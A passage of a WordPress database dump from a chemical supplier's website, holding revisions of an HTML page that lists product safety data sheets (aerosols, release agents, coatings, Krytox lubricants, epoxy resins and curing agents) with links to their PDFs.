center;">HELOXY 505</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/250.pdf">MS-250M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/582.pdf">MS-582</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/143ERED.pdf">MS-143E RED</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/Krytox250.pdf">250 SERIES</a></td>\r\n<td style="text-align: center;">BISPHENOL A-157</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/250.pdf">MS-250SP</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/702.pdf">MS-702</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/143H.pdf">MS-143H</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/Krytox280.pdf">280 SERIES</a></td>\r\n<td style="text-align: center;">EPON RESIN 164</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/255.pdf">MS-255</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/722.pdf">MS-722</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/143H1.pdf">MS-143H-1</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/283.pdf">283 SERIES</a></td>\r\n<td style="text-align: center;">EPON RESIN SU 8</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/255.pdf">MS-255M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/727.pdf">MS-727</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/143H25.pdf">MS-143H-2.5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/GPL29X.pdf">GPL 29X SERIES</a></td>\r\n<td style="text-align: center;">EPON RESIN 813</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/260.pdf">MS-260</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/732.pdf">MS-732</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/143H5.pdf">MS-143H-5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/GPL407.pdf">GPL 407</a></td>\r\n<td style="text-align: center;">EPON RESIN 815C</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/260.pdf">MS-260M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/739.pdf">MS-739</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/143H10.pdf">MS-143H-10</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/EG20003000.pdf">EG 2000, 3000</a></td>\r\n<td style="text-align: center;">EPON RESIN 825</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/280.pdf">MS-280</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/747.pdf">MS-747</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/143HBLUE.pdf">MS-143H BLUE</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/FPG.pdf">FPG SERIES</a></td>\r\n<td style="text-align: center;">EPON RESIN 826</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/530.pdf">MS-530</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/752.pdf">MS-752</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/143HRED.pdf">MS-143H RED</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/Lineargrease.pdf">LINEAR GREASE</a></td>\r\n<td style="text-align: center;">EPON RESIN 828</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/538.pdf">MS-538</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/752U.pdf">MS-752U</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/143TE.pdf">MS-143 TE</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/Linearoil.pdf">LINEAR OIL</a></td>\r\n<td style="text-align: center;">EPON RESIN 830</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/550.pdf"> MS-550</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/757.pdf">MS-757</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/143XD.pdf">MS-143XD</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/LVP.pdf">LVP</a></td>\r\n<td style="text-align: center;">EPON RESIN 834</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/555.pdf">MS-555</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/762.pdf">MS-762</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/143XD1.pdf">MS-143XD-1</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/NRT8990.pdf">NRT 8990</a></td>\r\n<td style="text-align: center;">EPON RESIN 862</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/560.pdf">MS-560</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/767.pdf">MS-767</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/143XD2.pdf">MS-143XD-2</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/NRT8906A.pdf">NRT 8906A</a></td>\r\n<td style="text-align: center;">EPON RESIN 872</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/580.pdf">MS-580</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/772.pdf">MS-772</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/143XD25.pdf">MS-143XD-2.5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/NRT8908.pdf">NRT 8908</a></td>\r\n<td style="text-align: center;">EPON RESIN 1001F</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/700.pdf">MS-700</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/777.pdf">MS-777</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/143XD5.pdf">MS-143XD-5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/NRT8950.pdf">NRT 8950</a></td>\r\n<td style="text-align: center;">EPON RESIN 1002F</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/700.pdf">MS-700M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/782.pdf">MS-782</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/143XD10.pdf">MS-143XD-10</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/NRT8980.pdf">NRT 8980</a></td>\r\n<td style="text-align: center;">EPON RESIN 1004F</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/720.pdf">MS-720</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/787.pdf">MS-787</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/145W.pdf">MS-145W</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/NRTgrease.pdf">NRT GREASE</a></td>\r\n<td style="text-align: center;">EPON RESIN 1007F</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/720.pdf">MS-720M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/797.pdf">MS-797</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/145W4.pdf">MS-145W-4</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/PFPEoilsXP.pdf">PFPE OIL W/SOLUBLE ADDITIVE</a></td>\r\n<td style="text-align: center;">EPON RESIN 1031</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/720L.pdf">MS-720L</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/110XB.pdf">MS-110XB</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/153BN.pdf">MS-153BN</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/PFPEgreaseXP.pdf">PFPE GREASE SOLUBLE ADDITIVE</a></td>\r\n<td style="text-align: center;">EPON RESIN 1050</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/725.pdf">MS-725</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/1010.pdf">MS-1010</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/A0305B.pdf">A0305B</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/PFPEoils.pdf">PFPE OILS</a></td>\r\n<td style="text-align: center;">EPON RESIN 1163</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/725.pdf">MS-725M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/2010.pdf">MS-2010</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/K1206A.pdf">K1206A</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/TS4.pdf">TS4 SEALANT</a></td>\r\n<td style="text-align: center;">EPON RESIN 8021</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/730.pdf">MS-730</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/3100MD.pdf">MS-31XXMD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/Y0717A.pdf">Y0717A</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/VPF.pdf">VACUUM PUMP FLUID</a></td>\r\n<td style="text-align: center;">EPON RESIN 8132</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/730.pdf">MS-730M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/3200MD.pdf">MS-32XXMD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/NRT960.pdf">Vydax NRT 960</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/VPFXP.pdf">VACUUM PUMP FLUID XP</a></td>\r\n<td style="text-align: center;">EPON RESIN 8280</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/730L.pdf">MS-730L</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/XP35.pdf">X-P35</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/RAIPA5.pdf">RA/IPA-5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/XHT500AF.pdf">XHT-500AF</a></td>\r\n<td style="text-align: center;">EPON RESIN 8281</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/738.pdf">MS-738</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/H0805B.pdf">H0805B</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/RAIPA15.pdf">RA/IPA-15</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/XHToils.pdf">XHT-OILS</a></td>\r\n<td style="text-align: center;">EPON RESIN 58005</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/738.pdf">MS-738M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/H1112B.pdf">H1112B</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/RAIPA.pdf">DryFilm RA/IPA</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/XHTAC.pdf">XHT-AC, ACX</a></td>\r\n<td style="text-align: center;">EPON RESIN 58034</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/745.pdf">MS-745</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/VertrelSDG.pdf">Vertrel SDG</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/RA.pdf">DryFilm RA</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/XHTBD.pdf">XHT-BD, BDX, BDZ</a></td>\r\n<td style="text-align: center;">EPONEX 1510</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/750.pdf">MS-750</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/VertrelSFR.pdf">Vertrel SFR</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/XHTS.pdf">XHT-S, SX, SZ</a></td>\r\n<td style="text-align: center;">EPI-REZ WD-510</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/750.pdf">MS-750M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/GPL2E.pdf">GPL 2E SERIES</a></td>\r\n<td style="text-align: center;">EPI-REZ 3522-W-60</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/755.pdf">MS-755</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/fluoroguard.pdf">PCA,PRO,SG</a></td>\r\n<td style="text-align: center;">EPI-REZ 5003-W-55</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/755.pdf">MS-755M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPI-REZ 5520-W-60</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/755L.pdf">MS-755L</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPI-REZ 5522-WY-55</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/760.pdf">MS-760</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3015</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/760.pdf">MS-760M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3046</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/765.pdf">MS-765</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3055</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/770.pdf">MS-770</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3115</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/770.pdf">MS-770M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3125</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/775.pdf">MS-775</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3140</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/775.pdf">MS-775M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3155</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/780.pdf">MS-780</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3164</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/780.pdf">MS-780M</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3223</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/795.pdf">MS-795</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3234</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/795.pdf">MS-795M</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3245</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/110X.pdf">MS-110X</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3253</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/120X.pdf">MS-120X</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3270</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/120XXP.pdf">MS-120X-XP</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3271</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/H0805A.pdf">H0805A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3274</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/J0912A.pdf">J0912A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3282</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/K0725A.pdf">K0725A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3290</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/K1016A.pdf">K1016A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3295</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">CURING AGENT W</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">ANCAMINE K54</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">ANCAMINE K61B</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">BDMA</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">BF3-400</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">DEAPA</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">NMA</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">VERSAMID 115</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">VERSAMID 125</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">VERSAMID 140</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'SDS', '', 'inherit', 'closed', 'closed', '', '1842-revision-v1', '', '', '2016-09-23 12:31:27', '2016-09-23 12:31:27', '', 1842, 'https://www.miller-stephenson.com/1842-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1980, 2, '2016-09-23 12:36:43', '2016-09-23 12:36:43', '<h1>Miller-Stephenson SDS database.</h1>\r\nIf you are unable to locate the specific SDS you need, please contact our Technical Support at support@mschem.com or 800-992-2424 (8-4 E.T.)\r\n<table width="1119">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="219"><strong>Aerosol</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Liquid</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Release Agents</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Conformal Coatings</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Krytox</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Epoxy</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/124H.pdf">MS-124H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/111.pdf">MS-111</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/122AD.pdf">MS-122AD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/452N.pdf">MS-452N</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/AGL683.pdf">AGL 683</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/900.pdf">MS-900</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/222L.pdf">MS-222L</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/114C.pdf">MS-114C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/122ADRED.pdf">MS-122AD RED</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/460H.pdf">MS-460H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/AT.pdf">AT</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/905A.pdf">MS-905 Part A</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/222N.pdf">MS-222N</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/115.pdf">MS-115</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/122ADL.pdf">MS-122ADL</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/462H.pdf">MS-462H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/ATA.pdf">ATA</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/905B.pdf">MS-905 Part B</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/222N.pdf">MS-222T</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/182SD.pdf">MS-182SD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/122AV.pdf">MS-122AV</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/465C.pdf">MS-465C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/AUT2A45.pdf">AUT 2A45</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/907A.pdf">MS-907 Part A</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/222N.pdf">MS-222F</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/126H.pdf">MS-126H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/122E.pdf">MS-122E</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/467C.pdf">MS-467C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/AUT523.pdf">AUT 523</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/907B.pdf">MS-907 Part B</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/242L.pdf">MS-242L</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/126HUV.pdf">MS-126HUV</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/122ERED.pdf">MS-122E RED</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/470C.pdf">MS-470C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/AUT1045.pdf">AUT 1045</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/908A.pdf">MS-908 Part 